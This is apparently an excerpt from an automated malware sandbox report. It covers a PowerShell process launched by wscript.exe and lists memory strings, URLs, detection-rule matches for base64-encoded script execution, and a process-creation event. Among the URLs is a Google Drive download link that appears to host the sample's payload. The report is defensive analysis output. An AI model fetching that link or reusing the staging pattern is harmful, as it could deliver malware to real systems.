Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1808945712.000001FF75C8D000.00000004.00000020.00020000.00000000.sdmp |
Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1809922936.000001FF75D2C000.00000004.00000020.00020000.00000000.sdmp |
Binary string: \??\C:\Windows\System.Management.Automation.pdb2 source: powershell.exe, 00000001.00000002.1809922936.000001FF75D2C000.00000004.00000020.00020000.00000000.sdmp |
Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000001.00000002.1824372929.000001FF75F84000.00000004.00000020.00020000.00000000.sdmp |
Binary string: \??\C:\Windows\dll\System.Core.pdb source: powershell.exe, 00000001.00000002.1808945712.000001FF75C8D000.00000004.00000020.00020000.00000000.sdmp |
Binary string: System.Management.Automation.pdbiTP)l source: powershell.exe, 00000001.00000002.1824372929.000001FF75F84000.00000004.00000020.00020000.00000000.sdmp |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1810470481.000001FF75F20000.00000004.00000020.00020000.00000000.sdmp |
Binary string: dows\dll\mscorlib.pdb source: powershell.exe, 00000001.00000002.1808945712.000001FF75C8D000.00000004.00000020.00020000.00000000.sdmp |
Binary string: lib.pdb{Yy source: powershell.exe, 00000001.00000002.1808945712.000001FF75C8D000.00000004.00000020.00020000.00000000.sdmp |
Binary string: n.pdbz source: powershell.exe, 00000001.00000002.1810470481.000001FF75F5E000.00000004.00000020.00020000.00000000.sdmp |
Binary string: ll\System.Core.pdb~YD source: powershell.exe, 00000001.00000002.1808945712.000001FF75C8D000.00000004.00000020.00020000.00000000.sdmp |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5FAEB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.google.com |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5FB24000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.usercontent.google.com |
Source: powershell.exe, 00000001.00000002.1801801088.000001FF6DAB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1801801088.000001FF6D974000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DB28000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5D901000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DB28000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5D901000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DE20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DEA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FAEB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://apis.google.com |
Source: powershell.exe, 00000001.00000002.1801801088.000001FF6D974000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000001.00000002.1801801088.000001FF6D974000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000001.00000002.1801801088.000001FF6D974000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5FAE6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.googP |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5F936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DB28000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DB28000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1kXTNaoxLJphfcAVSlYxVolD7HuHhKCJXP |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.googh |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE3D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE3D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=1kXTNaoxLJphfcAVSlYxVolD7HuHhKCJX&export=download |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DB28000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5ECD1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000001.00000002.1801801088.000001FF6DAB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1801801088.000001FF6D974000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DE20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DEA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FAEB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ssl.gstatic.com |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DE20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DEA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FAEB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-uri |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DE20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DEA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FAEB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DE20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DEA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FAEB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.googletagmanager.com |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DE20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DEA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FAEB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
Source: amsi64_7348.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7348, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |